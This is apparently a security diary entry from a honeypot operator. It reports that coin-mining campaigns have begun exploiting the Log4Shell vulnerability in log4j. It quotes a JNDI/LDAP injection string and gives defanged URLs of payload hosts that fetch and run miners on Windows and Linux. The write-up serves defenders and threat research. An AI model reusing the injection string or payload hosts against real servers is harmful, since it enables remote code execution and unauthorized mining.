Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
Analyzing the ISC honeypots' requests, I found out that coin miners just included Log4Shell into their arsenal.
The request that hit our honeypot is trying to make vulnerable log4j load the address 'jndi:ldap://45[.]83.193.150:1389/Exploit'. This will make log4j load and instantiate a malicious payload hosted at 'http://31[.]220.58.29/Exploit.class'.
I could find the payload address by doing a JNDI lookup, just like log4j does, then getting the class name and address by the returned reference object. To do so, I created a simple tool that is available on GitHub.
After decompiling the malicious class using fernflower, I could see the following code.
Depending on the targeted operating system, the code will download and execute codes hosted on different locations.
At http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, which will be loaded in the case of Windows SO, there is a Powershell script to download and execute a coin miner, as seen below.
For not Windows operating systems, the malicious class will download and execute an ELF binary hosted at http://18[.]228.7.109/.log/log. Although I suspect it's also a coin miner, the ELF file is yet to be analyzed.
Files (MD5 and SHA256 hashes)